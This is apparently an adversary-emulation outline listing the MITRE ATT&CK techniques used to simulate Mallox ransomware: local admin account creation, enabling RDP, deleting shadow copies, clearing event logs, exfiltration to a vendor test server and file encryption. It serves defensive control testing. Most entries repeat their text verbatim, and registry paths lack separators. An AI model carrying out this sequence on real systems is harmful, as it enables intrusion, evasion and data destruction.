Simulating the Mallox Ransomware Extortion Tactics

MITRE Techniques

• [T1105] Ingress Tool Transfer – These scenarios download to memory and save to disk in two separate scenarios to test network and endpoint controls and their ability to prevent the delivery of known malicious content. “These scenarios download to memory and save to disk in two separate scenarios to test network and endpoint controls and their ability to prevent the delivery of known malicious content.”
• [T1059.001] PowerShell – This scenario encodes a user-defined PowerShell script into base64 and then executes it using PowerShell’s -encodedCommand parameter. “This scenario encodes a user-defined PowerShell script into base64 and then executes it using PowerShell’s -encodedCommand parameter.”
• [T1047] Windows Management Instrumentation – This scenario executes a binary by creating a process using Windows Management Instrumentation (WMI). “This scenario executes a binary by creating a process using Windows Management Instrumentation (WMI).”
• [T1136.001] Create Account: Local Account – This scenario attempts to create a new user into the system with the net user Windows command. “This scenario attempts to create a new user into the system with the net user Windows command.”
• [T1098] Account Manipulation – This scenario adds a local user to the local Administrators and Remote Desktop Users groups using net localgroup. “This scenario adds a local user to the local Administrators group using the net localgroup command.” “This scenario adds a local user to the local Remote Desktop Users group using the net localgroup command.”
• [T1021.001] Remote Desktop Protocol – This scenario attempts to move laterally within a network using the Remote Desktop Protocol (RDP). “This scenario attempts to move laterally within a network using the Remote Desktop Protocol (RDP).”
• [T1562.001] Impair Defenses: Disable or Modify Tools – The registry key HKLMSYSTEMCurrentControlSetControlTerminal ServicesfDenyTSConnections is set to 0 which will enable remote access to the system using Remote Desktop. “The registry key HKLMSYSTEMCurrentControlSetControlTerminal ServicesfDenyTSConnections is set to 0 which will enable remote access to the system using Remote Desktop.”
• [T1562] Impair Defenses: Disable Limit Blank Password Use via Registry – This scenario disables the Limit Blank Password Use setting by setting the existing HKLMSYSTEMCurrentControlSetControlLsaLimitBlankPasswordUse registry key to 0. “This scenario disables the Limit Blank Password Use setting by setting the existing HKLMSYSTEMCurrentControlSetControlLsaLimitBlankPasswordUse registry key to 0.”
• [T1021.001] Remote Desktop Protocol – (Note: Additional mention under defense evasion/lateral movement aligns with T1021.001 as a lateral movement vector via RDP.)
• [T1490] Inhibit System Recovery – This scenario executes the vssadmin.exe utility to delete a recent Volume Shadow Copy created by the assessment template. “This scenario executes the vssadmin.exe utility to delete a recent Volume Shadow Copy created by the assessment template.”
• [T1497] Virtualization/Sandbox Evasion – This scenario will call the IsDebuggerPresent Windows API to detect the presence of a debugger attached to the current process. “This scenario will call the IsDebuggerPresent Windows API to detect the presence of a debugger attached to the current process.”
• [T1082] System Information Discovery – This scenario executes the GetNativeSystemInfo Native API call to retrieve information associated to the system. “This scenario executes the GetNativeSystemInfo Native API call to retrieve information associated to the system.”
• [T1016] System Network Configuration Discovery – This scenario executes route, ipconfig, nltest, net or arp commands to obtain the different information available about the network configuration. “This scenario executes route, ipconfig, nltest, net or arp commands to obtain the different information available about the network configuration.”
• [T1614] System Location Discovery – This scenario executes the GetLocaleInfoA Windows API to retrieve the user default country locale code from the local computer. “This scenario executes the GetLocaleInfoA Windows API to retrieve the user default country locale code from the local computer.”
• [T1048.003] Exfiltration Over Unencrypted Non-C2 Protocol – This scenario exfiltrates a pre-generated text file containing the output from a series of discovery commands executed by a threat actor. The file is exfiltrated using an HTTP POST request to an AttackIQ controlled test server. “This scenario exfiltrates a pre-generated text file containing the output from a series of discovery commands executed by a threat actor. The file is exfiltrated using an HTTP POST request to an AttackIQ controlled test server.”
• [T1486] Data Encrypted for Impact – This scenario performs the file encryption routines used by common ransomware families. Files matching an extension list are identified and encrypted in place using similar encryption algorithms. “This scenario performs the file encryption routines used by common ransomware families. Files matching an extension list are identified and encrypted in place using similar encryption algorithms.”
• [T1070.001] Indicator Removal: Clear Windows Event Logs – The scenario will use the wevtutil.exe binary to clear event logs from the system. “The scenario will use the wevtutil.exe binary to clear event logs from the system.”